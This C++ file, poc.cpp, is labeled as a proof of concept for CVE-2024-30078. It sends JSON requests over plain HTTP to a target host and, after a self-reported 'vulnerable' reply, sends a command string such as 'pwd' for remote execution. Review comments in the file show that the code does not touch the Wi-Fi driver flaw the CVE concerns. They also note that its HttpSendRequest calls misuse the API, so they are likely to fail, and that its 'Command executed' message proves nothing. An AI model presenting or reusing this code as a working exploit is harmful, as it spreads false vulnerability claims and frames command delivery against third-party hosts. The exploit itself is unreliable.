poc.cpp
#include <windows.h>
#include <iostream>
#include <string>
#include <wininet.h>
#pragma comment(lib, "wininet.lib")
// Sends a JSON "check" request to http://<ip>:<port><endpoint> over WinINet and,
// if the reply contains the text "vulnerable":true, sends a second JSON request
// carrying `command`. Progress and errors are printed to stdout/stderr; nothing
// is returned to the caller.
//
// Parameters:
//   ip       - host part of the URL (inserted as-is, no validation).
//   port     - TCP port, formatted with std::to_string.
//   endpoint - URL path appended directly after the port.
//   command  - string placed in the "command" field of the second JSON body.
//
// NOTE(review): everything here is application-layer HTTP. The only libraries
// used are WinINet and the C++ standard library; there is no wireless/802.11
// code. CVE-2024-30078 is catalogued as a Windows Wi-Fi driver vulnerability,
// so this function does not appear to exercise that code path at all. It only
// talks to an HTTP service that would have to understand these JSON messages.
// Treat the "PoC" label with caution when triaging.
//
// NOTE(review): the narrow string arguments compile only when the TCHAR macros
// resolve to the ANSI variants (UNICODE not defined). Confirm the build settings.
void trigger_exploit(const std::string& ip, int port, const std::string& endpoint, const std::string& command) {
    // Open a WinINet session with direct (no proxy) access. The first argument
    // is the agent string, so requests carry "CVE-2024-30078 PoC" as User-Agent,
    // a distinctive value that would be visible in proxy or web-server logs.
    HINTERNET hInternet = InternetOpen("CVE-2024-30078 PoC", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!hInternet) {
        std::cerr << "InternetOpen failed: " << GetLastError() << std::endl;
        return;
    }
    // Plain http:// URL assembled by concatenation: traffic is unencrypted and
    // ip/endpoint are not validated or encoded.
    std::string url = "http://" + ip + ":" + std::to_string(port) + endpoint;
    // Opens the URL with no extra headers; INTERNET_FLAG_RELOAD bypasses the cache.
    HINTERNET hConnect = InternetOpenUrl(hInternet, url.c_str(), NULL, 0, INTERNET_FLAG_RELOAD, 0);
    if (!hConnect) {
        std::cerr << "InternetOpenUrl failed: " << GetLastError() << std::endl;
        InternetCloseHandle(hInternet);
        return;
    }
    // Build the payload used to ask the server whether it is vulnerable.
    std::string payload = "{\"command\":\"check_vulnerability\",\"cve\":\"CVE-2024-30078\"}";
    std::string headers = "Content-Type: application/json\r\n";
    // NOTE(review): HttpSendRequest is documented to take a request handle created
    // by HttpOpenRequest, but hConnect comes from InternetOpenUrl. This call is
    // therefore expected to fail and the function to return in the branch below.
    // Verify on a test build.
    BOOL bRequest = HttpSendRequest(hConnect, headers.c_str(), headers.length(), (LPVOID)payload.c_str(), payload.length());
    if (!bRequest) {
        std::cerr << "HttpSendRequest failed: " << GetLastError() << std::endl;
        InternetCloseHandle(hConnect);
        InternetCloseHandle(hInternet);
        return;
    }
    // Read the response body in chunks of at most sizeof(buffer) - 1 bytes, leaving
    // room for the terminator written below.
    char buffer[1024];
    DWORD bytesRead;
    std::string response;
    while (InternetReadFile(hConnect, buffer, sizeof(buffer) - 1, &bytesRead) && bytesRead != 0) {
        buffer[bytesRead] = '\0';
        // Appended as a C string: any bytes after an embedded NUL in a chunk are
        // dropped. The total size of `response` is not bounded.
        response += buffer;
    }
    // The "detection" is a substring match on the server's own reply. Nothing is
    // probed, so the result is only as trustworthy as the responding service.
    if (response.find("\"vulnerable\":true") != std::string::npos) {
        std::cout << "Vulnerability detected on " << ip << ":" << port << std::endl;
        // Build the payload that carries the command. `command` is concatenated
        // without JSON escaping, so quotes or backslashes in it change the document.
        payload = "{\"command\":\"" + command + "\"}";
        bRequest = HttpSendRequest(hConnect, headers.c_str(), headers.length(), (LPVOID)payload.c_str(), payload.length());
        // A TRUE result only means the request was sent. No response is read, so
        // the "Command executed" message is not evidence that anything ran remotely.
        if (bRequest) {
            std::cout << "Command executed on " << ip << ":" << port << std::endl;
        } else {
            std::cerr << "Failed to execute command: " << GetLastError() << std::endl;
        }
    } else {
        std::cout << "No vulnerability detected on " << ip << ":" << port << std::endl;
    }
    // Release the URL handle first, then the session handle.
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);
}
// Entry point: calls trigger_exploit once with hard-coded sample values.
// Each value is a placeholder the author expects to be replaced before use.
int main() {
    const std::string target_host{"192.168.1.1"};  // replace with the actual IP address
    const int target_port{80};                     // replace with the actual port
    const std::string target_path{"/check"};       // replace with the actual endpoint path
    const std::string remote_cmd{"pwd"};           // replace with the command string to send

    trigger_exploit(target_host, target_port, target_path, remote_cmd);
    return 0;
}